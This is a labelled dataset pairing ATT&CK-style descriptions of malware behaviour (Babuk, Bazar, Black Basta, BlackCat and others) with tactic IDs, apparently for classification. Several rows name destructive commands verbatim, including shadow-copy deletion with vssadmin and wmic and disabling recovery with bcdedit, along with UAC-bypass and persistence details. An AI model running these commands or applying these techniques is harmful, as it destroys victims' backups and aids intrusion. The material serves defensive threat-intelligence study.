BONDUPDATER persists using a scheduled task that executes every minute.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.,['TA0002:Execution']
BOOSTWRITE has been signed by a valid CA.,['TA0005:Defense Evasion']
"BOOSTWRITE has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BOOSTWRITE has used a a 32-byte long multi-XOR key to decode data inside its payload.,['TA0005:Defense Evasion']
BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector to evade detection.,['TA0005:Defense Evasion']
BOOSTWRITE has used the DWriteCreateFactory function to load additional modules.,['TA0002:Execution']
BOOTRASH is a Volume Boot Record bootkit that uses the VBR to maintain persistence.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.,['TA0005:Defense Evasion']
"After initial execution, BPFDoor forks itself and runs the fork with the `--init` flag, which allows it to execute secondary clean up operations. The parent process terminates leaving the forked process to be inherited by the legitimate process init.",['TA0005:Defense Evasion']
"BPFDoor starts a shell on a high TCP port starting at 42391 up to 43391, then changes the local `iptables` rules to redirect all packets from the attacker to the shell port.",['TA0005:Defense Evasion']
BPFDoor creates a zero byte PID file at `/var/run/haldrund.pid`. BPFDoor uses this file to determine if it is already running on a system to ensure only one instance is executing at a time.,['TA0005:Defense Evasion']
"After initial setup, BPFDoor's original execution process deletes the dropped binary and exits.",['TA0005:Defense Evasion']
"BPFDoor set's it's process to ignore the following signals; `SIGHUP`, `SIGINT`, `SIGQUIT`, `SIGPIPE`, `SIGCHLD`, `SIGTTIN`, and `SIGTTOU`.",['TA0005:Defense Evasion']
BPFDoor sets the `MYSQL_HISTFILE` and `HISTFILE` to `/dev/null` preventing the shell and MySQL from logging history in `/proc//environ`.,['TA0005:Defense Evasion']
BPFDoor clears the file location `/proc//environ` removing all environment variables for the process.,['TA0005:Defense Evasion']
"BPFDoor overwrites the `argv0` value used by the Linux `/proc` filesystem to determine the command line and command name to display for each process. BPFDoor selects a name from 10 hardcoded names that resemble Linux system daemons, such as; `/sbin/udevd -d`, `dbus-daemon --system`, `avahi-daemon: chroot helper`, `/sbin/auditd -n`, and `/usr/lib/systemd/systemd-journald`.",['TA0005:Defense Evasion']
BPFDoor can require a password to activate the backdoor and uses RC4 encryption or static library encryption `libtomcrypt`.,['TA0005:Defense Evasion']
"BPFDoor uses BPF bytecode to attach a filter to a network socket to view ICMP, UDP, or TCP packets coming through ports 22 , 80 , and 443 . When BPFDoor finds a packet containing its “magic” bytes, it parses out two fields and forks itself. The parent process continues to monitor filtered traffic while the child process executes the instructions from the parsed fields.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
BPFDoor uses the `utimes` function to change the executable's timestamp.,['TA0005:Defense Evasion']
BPFDoor can create a reverse shell and supports vt100 emulator formatting.,['TA0002:Execution']
BS2005 uses Base64 encoding for communication in the message body of an HTTP request.,['TA0011:Command and Control']
BUBBLEWRAP can communicate using SOCKS.,['TA0011:Command and Control']
"BUBBLEWRAP collects system information, including the operating system version and hostname.",['TA0007:Discovery']
BUBBLEWRAP can communicate using HTTP or HTTPS.,['TA0011:Command and Control']
BUSHWALK can embed into the legitimate `querymanifest.cgi` file on compromised Ivanti Connect Secure VPNs.,['TA0003:Persistence']
BUSHWALK can Base64 decode and RC4 decrypt malicious payloads sent through a web request’s command parameter.,['TA0005:Defense Evasion']
BUSHWALK can write malicious payloads sent through a web request’s command parameter.,['TA0011:Command and Control']
BUSHWALK can encrypt the resulting data generated from C2 commands with RC4.,['TA0005:Defense Evasion']
BUSHWALK can modify the `DSUserAgentCap.pm` Perl module on Ivanti Connect Secure VPNs and either activate or deactivate depending on the value of the user agent in incoming HTTP requests.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
BUSHWALK is a web shell that has the ability to execute arbitrary commands or write files.,['TA0003:Persistence']
Babuk can use ChaCha8 and ECDH to encrypt data.,['TA0040:Impact']
Babuk has the ability to unpack itself into memory using XOR.,['TA0005:Defense Evasion']
Babuk can stop anti-virus services on a compromised host.,['TA0005:Defense Evasion']
Babuk has the ability to enumerate files on a targeted system.,['TA0007:Discovery']
Babuk has the ability to delete shadow volumes using vssadmin.exe delete shadows /all /quiet.,['TA0040:Impact']
Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution.,['TA0002:Execution']
Babuk has the ability to enumerate network shares.,['TA0007:Discovery']
Babuk has the ability to check running processes on a targeted system.,['TA0007:Discovery']
Babuk can stop specific services related to backups.,['TA0040:Impact']
Versions of Babuk have been packed.,['TA0005:Defense Evasion']
"Babuk can enumerate disk volumes, get disk information, and query service status.",['TA0007:Discovery']
Babuk can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption.,['TA0007:Discovery']
Babuk can enumerate all services running on a compromised host.,['TA0007:Discovery']
Babuk has the ability to use the command line to control execution on compromised hosts.,['TA0002:Execution']
BabyShark has the ability to decode downloaded files prior to execution.,['TA0005:Defense Evasion']
BabyShark has cleaned up all files associated with the secondary payload execution.,['TA0005:Defense Evasion']
"BabyShark has used dir to search for ""programfiles"" and ""appdata"".",['TA0007:Discovery']
BabyShark has downloaded additional files from the C2.,['TA0011:Command and Control']
BabyShark has a PowerShell-based remote administration ability that can implement a PowerShell or C# based keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
BabyShark has used mshta.exe to download and execute applications from a remote server.,['TA0005:Defense Evasion']
BabyShark has executed the tasklist command.,['TA0007:Discovery']
BabyShark has executed the reg query command for HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default.,['TA0007:Discovery']
BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BabyShark has used scheduled tasks to maintain persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BabyShark has encoded data using certutil before exfiltration.,['TA0011:Command and Control']
BabyShark has executed the ver command.,['TA0007:Discovery']
BabyShark has executed the ipconfig /all command.,['TA0007:Discovery']
BabyShark has executed the whoami command.,['TA0007:Discovery']
BabyShark has used cmd.exe to execute commands.,['TA0002:Execution']
BackConfig has been signed with self signed digital certificates mimicking a legitimate software company.,['TA0005:Defense Evasion']
BackConfig has used compressed and decimal encoded VBS scripts.,['TA0005:Defense Evasion']
BackConfig has used a custom routine to decrypt strings.,['TA0005:Defense Evasion']
BackConfig has the ability to remove files and folders related to previous infections.,['TA0005:Defense Evasion']
BackConfig has the ability to identify folders and files related to previous infections.,['TA0007:Discovery']
BackConfig has the ability to set folders or files to be hidden from the Windows Explorer default view.,['TA0005:Defense Evasion']
BackConfig can download and execute additional payloads on a compromised host.,['TA0011:Command and Control']
BackConfig has compromised victims via links to URLs hosting malicious content.,['TA0002:Execution']
BackConfig has hidden malicious payloads in %USERPROFILE%\Adobe\Driver\dwg\ and mimicked the legitimate DHCP service binary.,['TA0005:Defense Evasion']
BackConfig can leverage API functions such as ShellExecuteA and HttpOpenRequestA in the process of downloading and executing files.,['TA0002:Execution']
BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.,['TA0003:Persistence']
BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BackConfig has the ability to gather the victim's computer name.,['TA0007:Discovery']
BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code.,['TA0002:Execution']
BackConfig has the ability to use HTTPS for C2 communiations.,['TA0011:Command and Control']
BackConfig can download and run batch files to execute commands on a compromised host.,['TA0002:Execution']
Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.,['TA0009:Collection']
Some Backdoor.Oldrea samples contain a publicly available Web browser password recovery tool.,['TA0006:Credential Access']
Backdoor.Oldrea collects address book information from Outlook.,['TA0007:Discovery']
Backdoor.Oldrea contains a cleanup module that removes traces of itself from the victim.,['TA0005:Defense Evasion']
"Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.",['TA0007:Discovery']
Backdoor.Oldrea can download additional modules from C2.,['TA0011:Command and Control']
Backdoor.Oldrea can use a network scanning module to identify ICS-related ports.,['TA0007:Discovery']
Backdoor.Oldrea collects information about running processes.,['TA0007:Discovery']
Backdoor.Oldrea injects itself into explorer.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Backdoor.Oldrea adds Registry Run keys to achieve persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Backdoor.Oldrea can enumerate and map ICS-specific systems in victim environments.,['TA0007:Discovery']
Backdoor.Oldrea can use rundll32 for execution on compromised hosts.,['TA0005:Defense Evasion']
"Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.",['TA0011:Command and Control']
Backdoor.Oldrea collects information about the OS and computer name.,['TA0007:Discovery']
Backdoor.Oldrea collects information about the Internet adapter configuration.,['TA0007:Discovery']
Backdoor.Oldrea collects the current username from the victim.,['TA0007:Discovery']
Bad Rabbit has attempted to bypass UAC and gain elevated administrative privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bad Rabbit has encrypted files and disks using AES-128-CBC and RSA-2048.,['TA0040:Impact']
Bad Rabbit spread through watering holes on popular sites by injecting JavaScript into the HTML body or a .js file.,['TA0001:Initial Access']
Bad Rabbit used the EternalRomance SMB exploit to spread through victim networks.,['TA0008:Lateral Movement']
Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.,['TA0040:Impact']
Bad Rabbit has used Mimikatz to harvest credentials from the victim's machine.,['TA0006:Credential Access']
Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.,['TA0002:Execution']
Bad Rabbit has masqueraded as a Flash Player installer through the executable file install_flash_player.exe.,['TA0005:Defense Evasion']
Bad Rabbit has used various Windows API calls.,['TA0002:Execution']
Bad Rabbit enumerates open SMB shares on internal victim networks.,['TA0007:Discovery']
Bad Rabbit’s infpub.dat file uses NTLM login credentials to brute force Windows machines.,['TA0006:Credential Access']
Bad Rabbit can enumerate all running processes to compare hashes.,['TA0007:Discovery']
Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.,['TA0005:Defense Evasion']
Bad Rabbit’s infpub.dat file creates a scheduled task to launch a malicious executable.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bad Rabbit drops a file named infpub.datinto the Windows directory and is executed through SCManager and rundll.exe.,['TA0002:Execution']
"BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.",['TA0009:Collection']
BadPatch searches for files with specific file extensions.,['TA0007:Discovery']
BadPatch can download and execute or update malware.,['TA0011:Command and Control']
BadPatch has a keylogging capability.,"['TA0009:Collection', 'TA0006:Credential Access']"
BadPatch stores collected data in log files before exfiltration.,['TA0009:Collection']
BadPatch uses SMTP for C2.,['TA0011:Command and Control']
BadPatch establishes a foothold by adding a link to the malware executable in the startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BadPatch captures screenshots in .jpg format and then exfiltrates them.,['TA0009:Collection']
BadPatch uses WMI to enumerate installed security products in the victim’s environment.,['TA0007:Discovery']
"BadPatch attempts to detect if it is being run in a Virtual Machine using a WMI query for disk drive name, BIOS, and motherboard information.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.",['TA0007:Discovery']
BadPatch uses HTTP for C2.,['TA0011:Command and Control']
Bandook has modules that are capable of capturing audio.,['TA0009:Collection']
Bandook was signed with valid Certum certificates.,['TA0005:Defense Evasion']
Bandook can support commands to execute Java-based payloads.,['TA0002:Execution']
Bandook can collect local files from the system .,['TA0009:Collection']
Bandook has decoded its PowerShell script.,['TA0005:Defense Evasion']
Bandook can upload files from a victim's machine over the C2 channel.,['TA0010:Exfiltration']
Bandook has a command to delete a file.,['TA0005:Defense Evasion']
Bandook has a command to list files on a system.,['TA0007:Discovery']
Bandook can download files to the system.,['TA0011:Command and Control']
Bandook contains keylogging capabilities.,"['TA0009:Collection', 'TA0006:Credential Access']"
Bandook has used lure documents to convince the user to enable macros.,['TA0002:Execution']
Bandook has used the ShellExecuteW function call.,['TA0002:Execution']
Bandook has a command built in to use a raw TCP socket.,['TA0011:Command and Control']
Bandook can detect USB devices.,['TA0007:Discovery']
Bandook has used PowerShell loaders as part of execution.,['TA0002:Execution']
Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bandook can support commands to execute Python-based payloads.,['TA0002:Execution']
Bandook is capable of taking an image of and uploading the current desktop.,['TA0009:Collection']
Bandook is delivered via a malicious Word document inside a zip file.,['TA0001:Initial Access']
Bandook has used .PNG images within a zip file to build the executable.,['TA0005:Defense Evasion']
Bandook has used AES encryption for C2 communication.,['TA0011:Command and Control']
Bandook can collect information about the drives available on the system.,['TA0007:Discovery']
Bandook has a command to get the public IP address from a system.,['TA0007:Discovery']
Bandook has modules that are capable of capturing video from a victim's webcam.,['TA0009:Collection']
Bandook has used malicious VBA code against the target system.,['TA0002:Execution']
Bandook is capable of spawning a Windows command shell.,['TA0002:Execution']
Bankshot recursively generates a list of files within a directory and sends them back to the control server.,['TA0009:Collection']
Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bankshot collects files from the local system.,['TA0009:Collection']
Bankshot decodes embedded XOR strings.,['TA0005:Defense Evasion']
Bankshot gathers domain and account names/information through process monitoring.,['TA0007:Discovery']
Bankshot exfiltrates data over its C2 channel.,['TA0010:Exfiltration']
Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.,['TA0002:Execution']
Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.,['TA0005:Defense Evasion']
Bankshot searches for files on the victim's machine.,['TA0007:Discovery']
Bankshot deletes all artifacts associated with the malware from the infected machine.,['TA0005:Defense Evasion']
Bankshot uploads files and secondary payloads to the victim's machine.,['TA0011:Command and Control']
Bankshot gathers domain and account names/information through process monitoring.,['TA0007:Discovery']
Bankshot writes data into the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj.,['TA0005:Defense Evasion']
Bankshot creates processes using the Windows API calls: CreateProcessA and CreateProcessAsUserA.,['TA0002:Execution']
Bankshot encodes commands from the control server using a range of characters and gzip.,['TA0011:Command and Control']
Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.,['TA0011:Command and Control']
Bankshot identifies processes and collects the process ids.,['TA0007:Discovery']
Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.,['TA0011:Command and Control']
Bankshot searches for certain Registry keys to be configured before executing the payload.,['TA0007:Discovery']
"Bankshot gathers system information, network addresses, disk type, disk free space, and the operation system version.",['TA0007:Discovery']
Bankshot modifies the time of a file as specified by the control server.,['TA0005:Defense Evasion']
Bankshot uses HTTP for command and control communication.,['TA0011:Command and Control']
Bankshot uses the command-line interface to execute arbitrary commands.,['TA0002:Execution']
Bankshot can terminate a specific process by its process id.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bazar can use TLS in C2 communications.,['TA0011:Command and Control']
Bazar has been downloaded via Windows BITS functionality.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Bazar's loader can delete scheduled tasks created by a previous instance of the malware.,['TA0005:Defense Evasion']
Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.,['TA0005:Defense Evasion']
Bazar can retrieve information from the infected machine.,['TA0009:Collection']
Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime.,['TA0005:Defense Evasion']
Bazar has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.,['TA0005:Defense Evasion']
Bazar has the ability to identify domain administrator accounts.,['TA0007:Discovery']
Bazar can implement DGA using the current date as a seed variable.,['TA0011:Command and Control']
Bazar can use Nltest tools to obtain information about the domain.,['TA0007:Discovery']
The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe.,['TA0005:Defense Evasion']
Bazar can hash then resolve API calls at runtime.,['TA0005:Defense Evasion']
"Bazar has used XOR, RSA2, and RC4 encrypted files.",['TA0005:Defense Evasion']
Bazar has the ability to use an alternative C2 server if the primary server fails.,['TA0011:Command and Control']
Bazar can delete its loader using a batch file in the Windows temporary folder.,['TA0005:Defense Evasion']
Bazar can enumerate the victim's desktop.,['TA0007:Discovery']
"Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.",['TA0011:Command and Control']
Bazar can identify administrator accounts on an infected host.,['TA0007:Discovery']
Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.,['TA0002:Execution']
Bazar can create a task named to appear benign.,['TA0005:Defense Evasion']
"The Bazar loader has named malicious shortcuts ""adobe"" and mimicked communications software.",['TA0005:Defense Evasion']
The Bazar loader is used to download and execute the Bazar backdoor.,['TA0011:Command and Control']
Bazar can use various APIs to allocate memory and facilitate code execution/injection.,['TA0002:Execution']
Bazar can enumerate shared drives on the domain.,['TA0007:Discovery']
Bazar can execute a PowerShell script received from C2.,['TA0002:Execution']
Bazar can identity the current process on a compromised host.,['TA0007:Discovery']
Bazar can inject into a target process using process doppelgänging.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bazar can inject code through calling VirtualAllocExNuma.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bazar can query Windows\CurrentVersion\Uninstall for installed applications.,['TA0007:Discovery']
Bazar can create or add files to Registry Run Keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bazar can enumerate remote systems using Net View.,['TA0007:Discovery']
Bazar can create a scheduled task for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bazar can identify the installed antivirus engine.,['TA0007:Discovery']
Bazar can establish persistence by writing shortcuts to the Windows Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bazar can query the Registry for installed applications.,['TA0007:Discovery']
Bazar has a variant with a packed payload.,['TA0005:Defense Evasion']
Bazar has been spread via emails with embedded malicious links.,['TA0001:Initial Access']
Bazar can send C2 communications with XOR encryption.,['TA0011:Command and Control']
"Bazar can fingerprint architecture, computer name, and OS version on the compromised host. Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found.",['TA0007:Discovery']
Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.,['TA0007:Discovery']
Bazar can collect the IP address and NetBIOS name of an infected machine.,['TA0007:Discovery']
Bazar can identify the username of the infected user.,['TA0007:Discovery']
Bazar can collect the time on the compromised host.,['TA0007:Discovery']
Bazar can use a timer to delay execution of core functionality.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bazar can attempt to overload sandbox analysis by sending 1550 calls to printf.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.,['TA0011:Command and Control']
Bazar downloads have been hosted on Google Docs.,['TA0011:Command and Control']
Bazar can launch cmd.exe to perform reconnaissance commands.,['TA0002:Execution']
Bazar can execute a WMI query to gather information about the installed antivirus engine.,['TA0002:Execution']
Bazar can use Winlogon Helper DLL to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BendyBear has decrypted function blocks using a XOR key during runtime to evade detection.,['TA0005:Defense Evasion']
BendyBear has encrypted payloads using RC4 and XOR.,['TA0005:Defense Evasion']
BendyBear is designed to download an implant from a C2 server.,['TA0011:Command and Control']
BendyBear has used byte randomization to obscure its behavior.,['TA0011:Command and Control']
BendyBear can load and execute modules and Windows Application Programming calls using standard shellcode API hashing.,['TA0002:Execution']
BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.,['TA0011:Command and Control']
BendyBear changes its runtime footprint during code execution to evade signature-based defenses.,['TA0005:Defense Evasion']
BendyBear can query the host's Registry key at HKEY_CURRENT_USER\Console\QuickEdit to retrieve data.,['TA0007:Discovery']
BendyBear communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.,['TA0011:Command and Control']
BendyBear has the ability to determine local time on a compromised host.,['TA0007:Discovery']
BendyBear can check for analysis environments and signs of debugging using the Windows API kernel32!GetTickCountKernel32 call.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bisonal has been loaded through a `.wll` extension added to the ` %APPDATA%\microsoft\word\startup\` repository.,['TA0003:Persistence']
Bisonal has appended random binary data to the end of itself to generate a large binary.,['TA0005:Defense Evasion']
Bisonal has collected information from a compromised host.,['TA0009:Collection']
Bisonal has decoded strings in the malware using XOR and RC4.,['TA0005:Defense Evasion']
Bisonal has used a dynamic DNS service for C2.,['TA0011:Command and Control']
Bisonal's DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.,['TA0005:Defense Evasion']
Bisonal has added the exfiltrated data to the URL over the C2 channel.,['TA0010:Exfiltration']
Bisonal will delete its dropper and VBS scripts from the victim’s machine.,['TA0005:Defense Evasion']
Bisonal can retrieve a file listing from the system.,['TA0007:Discovery']
Bisonal has the capability to download files to execute on the victim’s machine.,['TA0011:Command and Control']
Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails.,['TA0002:Execution']
Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.,['TA0005:Defense Evasion']
Bisonal has renamed malicious code to `msacm32.dll` to hide within a legitimate library; earlier versions were disguised as `winhelp`.,['TA0005:Defense Evasion']
Bisonal has deleted Registry keys to clean up its prior activity.,['TA0005:Defense Evasion']
Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread.,['TA0002:Execution']
Bisonal has used raw sockets for network communication.,['TA0011:Command and Control']
Bisonal can obtain a list of running processes on the victim’s machine.,['TA0007:Discovery']
Bisonal has supported use of a proxy server.,['TA0011:Command and Control']
Bisonal has used the RegQueryValueExA function to retrieve proxy information in the Registry.,['TA0007:Discovery']
Bisonal has added itself to the Registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\ for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”.",['TA0005:Defense Evasion']
Bisonal has used the MPRESS packer and similar tools for obfuscation.,['TA0005:Defense Evasion']
Bisonal has been delivered as malicious email attachments.,['TA0001:Initial Access']
Bisonal has encoded binary data with Base64 and ASCII.,['TA0011:Command and Control']
Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.,['TA0011:Command and Control']
Bisonal has used commands and API calls to gather system information.,['TA0007:Discovery']
Bisonal can execute ipconfig on the victim’s machine.,['TA0007:Discovery']
Bisonal can check the system time set on the infected host.,['TA0007:Discovery']
Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount to compare the timing.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bisonal can check to determine if the compromised system is running on VMware.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bisonal's dropper creates VBS scripts on the victim’s machine.,['TA0002:Execution']
Bisonal has used HTTP for C2 communications.,['TA0011:Command and Control']
Bisonal has launched cmd.exe and used the ShellExecuteW API function to execute commands on the system.,['TA0002:Execution']
Bisonal has been modified to be used as a Windows service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"BitPaymer can suppress UAC prompts by setting the HKCU\Software\Classes\ms-settings\shell\open\command registry key on Windows 10 or HKCU\Software\Classes\mscfile\shell\open\command on Windows 7 and launching the eventvwr.msc process, which launches BitPaymer with elevated privileges.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending .locked to the filename.",['TA0040:Impact']
BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.,['TA0005:Defense Evasion']
BitPaymer compares file names and paths to a list of excluded names and directory names during encryption.,['TA0005:Defense Evasion']
BitPaymer attempts to remove the backup shadow files from the host using vssadmin.exe Delete Shadows /All /Quiet.,['TA0040:Impact']
BitPaymer can enumerate the sessions for each user logged onto the infected host.,['TA0007:Discovery']
BitPaymer can set values in the Registry to help in execution.,['TA0005:Defense Evasion']
BitPaymer has copied itself to the :bin alternate data stream of a newly created file.,['TA0005:Defense Evasion']
"BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including RegEnumKeyW.",['TA0002:Execution']
BitPaymer can search for network shares on the domain or workgroup using net view .,['TA0007:Discovery']
BitPaymer can use the RegEnumKeyW to iterate through Registry keys.,['TA0007:Discovery']
BitPaymer has set the run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BitPaymer can use net view to discover remote systems.,['TA0007:Discovery']
BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem.,['TA0007:Discovery']
BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.,['TA0005:Defense Evasion']
BitPaymer can use the tokens of users to create processes on infected systems.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BitPaymer can use icacls /reset and takeown /F to reset a targeted executable's permissions and then take ownership.,['TA0005:Defense Evasion']
BitPaymer has attempted to install itself as a service to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Black Basta had added data prior to the Portable Executable header to prevent automatic scanners from identifying the payload.,['TA0005:Defense Evasion']
The Black Basta dropper has been digitally signed with a certificate issued by Akeo Consulting for legitimate executables used for creating bootable USB drives.,['TA0005:Defense Evasion']
Black Basta can encrypt files with the ChaCha20 cypher and using a multithreaded process to increase speed.,['TA0040:Impact']
"The Black Basta dropper can check system flags, CPU registers, CPU instructions, process timing, system libraries, and APIs to determine if a debugger is present.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Black Basta can enumerate specific files for encryption.,['TA0007:Discovery']
Black Basta can delete shadow copies using vssadmin.exe.,['TA0040:Impact']
Black Basta has set the desktop wallpaper on victims' machines to display a ransom note.,['TA0040:Impact']
The Black Basta binary can use `chmod` to gain full permissions to targeted files.,['TA0005:Defense Evasion']
Black Basta has been downloaded and executed from malicious Excel files.,['TA0002:Execution']
Black Basta has established persistence by creating a new service named `FAX` after deleting the legitimate service by the same name.,['TA0005:Defense Evasion']
The Black Basta dropper has mimicked an application for creating USB bootable drivers.,['TA0005:Defense Evasion']
Black Basta can modify the Registry to enable itself to run in safe mode and to modify the icons and file extensions for encrypted files.,['TA0005:Defense Evasion']
Black Basta will check for the presence of a hard-coded mutex `dsajdhas.0` before executing.,['TA0005:Defense Evasion']
Black Basta has the ability to use native APIs for numerous functions including discovery and defense evasion.,['TA0002:Execution']
Black Basta has used PowerShell scripts for discovery and to execute files over the network.,['TA0002:Execution']
Black Basta can use LDAP queries to connect to AD and iterate over connected workstations.,['TA0007:Discovery']
Black Basta can reboot victim machines in safe mode with networking via `bcdedit /set safeboot network`.,['TA0005:Defense Evasion']
"Black Basta can check system flags and libraries, process timing, and API's to detect code emulation or sandboxing.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Black Basta can enumerate volumes and collect system boot configuration and CPU information.,['TA0007:Discovery']
Black Basta can check whether the service name FAX is present.,['TA0007:Discovery']
Black Basta can make a random number of calls to the `kernel32.beep` function to hinder log analysis.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Black Basta can use `cmd.exe` to enable shadow copy deletion.,['TA0002:Execution']
Black Basta has used WMI to execute files over the network.,['TA0002:Execution']
Black Basta can create a new service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BlackCat has the ability modify access tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BlackCat can bypass UAC to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BlackCat can clear Windows event logs using `wevtutil.exe`.,['TA0005:Defense Evasion']
"BlackCat has the ability to encrypt Windows devices, Linux devices, and VMWare instances.",['TA0040:Impact']
BlackCat has the ability to wipe VM snapshots on compromised networks.,['TA0040:Impact']
BlackCat can utilize `net use` commands to identify domain users.,['TA0007:Discovery']
BlackCat can determine if a user on a compromised host has domain admin privileges.,['TA0007:Discovery']
BlackCat can enumerate files for encryption.,['TA0007:Discovery']
BlackCat can delete shadow copies using `vssadmin.exe delete shadows /all /quiet` and `wmic.exe Shadowcopy Delete`; it can also modify the boot loader using `bcdedit /set {default} recoveryenabled No`.,['TA0040:Impact']
BlackCat can change the desktop wallpaper on compromised hosts.,['TA0040:Impact']
BlackCat can replicate itself across connected servers via `psexec`.,['TA0008:Lateral Movement']
BlackCat has the ability to add the following registry key on compromised networks to maintain persistence: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Paramenters`,['TA0005:Defense Evasion']
